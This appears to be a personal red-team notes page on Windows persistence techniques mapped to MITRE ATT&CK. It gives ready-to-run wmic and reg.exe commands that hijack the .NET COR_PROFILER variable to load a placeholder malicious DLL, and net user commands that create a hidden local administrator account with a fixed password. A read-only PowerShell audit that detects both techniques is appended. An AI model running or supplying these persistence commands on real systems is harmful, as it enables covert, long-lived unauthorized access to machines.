burmat / nathan burchfield

Persistence

The adversary is trying to maintain their foothold. https://attack.mitre.org/tactics/TA0003/

COR Profiler Variable Hijack

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

# deleting existing COR_PROFILER variable
wmic ENVIRONMENT where "name='COR_PROFILER'" delete

# creating COR_ENABLE_PROFILING variable and setting it to 1
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="<system>",VariableValue="1"

# creating a new COR_PROFILER variable
wmic ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="<arbitrary CLSID>"

# adding registry keys for malicious DLL
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /V ThreadingModel /T REG_SZ /D Apartment /F
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /VE /T REG_SZ /D "<malicious_DLL>" /F

Local Administrator Account Creation

# creating a local user, then adding it to the local Administrators group
net user burmat BURMAT123123123 /add
net localgroup administrators burmat /add
# listing the group members to verify the change
net localgroup administrators
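An added defender-side audit (example code, not from the original page or the linked blog): a read-only PowerShell check that looks for the COR_* environment variables and CLSID InProcServer32 registration used by the profiler hijack above, resolves and signature-checks the DLL, and flags local Administrators members outside a baseline. The `$expected` list is an assumption to adjust for your build standard.

```powershell
# Added example (defender-side audit), not code from the original page. Read-only; run elevated.
# 1) CLR profiler hijack: COR_* variables in the system and per-user environment blocks.
$envKeys = @('HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment')  # wmic username="<system>" writes here
if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}
$envKeys += @(Get-ChildItem -Path 'HKU:\' -ErrorAction SilentlyContinue |
    ForEach-Object { "HKU:\$($_.PSChildName)\Environment" } |
    Where-Object { Test-Path -LiteralPath $_ })

foreach ($key in $envKeys) {
    $block = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue
    foreach ($name in 'COR_ENABLE_PROFILING', 'COR_PROFILER', 'COR_PROFILER_PATH') {
        $value = $block.$name
        if (-not $value) { continue }
        Write-Output "[!] $key : $name = $value"
        if ($name -ne 'COR_PROFILER') { continue }
        # COR_PROFILER holds a CLSID; resolve it the way the CLR does, through InProcServer32.
        foreach ($classes in 'HKLM:\SOFTWARE\Classes', 'HKLM:\SOFTWARE\WOW6432Node\Classes') {
            $srv = "$classes\CLSID\$value\InProcServer32"
            if (-not (Test-Path -LiteralPath $srv)) { continue }
            $dll = (Get-ItemProperty -LiteralPath $srv).'(default)'
            Write-Output "    -> $srv : $dll"
            if ($dll -and (Test-Path -LiteralPath $dll)) {
                $sig = Get-AuthenticodeSignature -FilePath $dll
                Write-Output "       signature: $($sig.Status) ($($sig.SignerCertificate.Subject))"
            }
        }
    }
}

# 2) Local Administrators membership against an expected baseline (assumption: edit for your build).
$expected = @('Administrator', 'Domain Admins')
Get-LocalGroupMember -Group 'Administrators' | ForEach-Object {
    $short = ($_.Name -split '\\')[-1]   # strip the DOMAIN\ or HOST\ prefix
    if ($expected -notcontains $short) {
        Write-Output "[!] unexpected Administrators member: $($_.Name) [$($_.PrincipalSource)]"
    }
}
```

Any COR_ENABLE_PROFILING=1 outside a developer or APM deployment, or a COR_PROFILER CLSID resolving to an unsigned DLL in a user-writable path, is worth treating as a persistence finding.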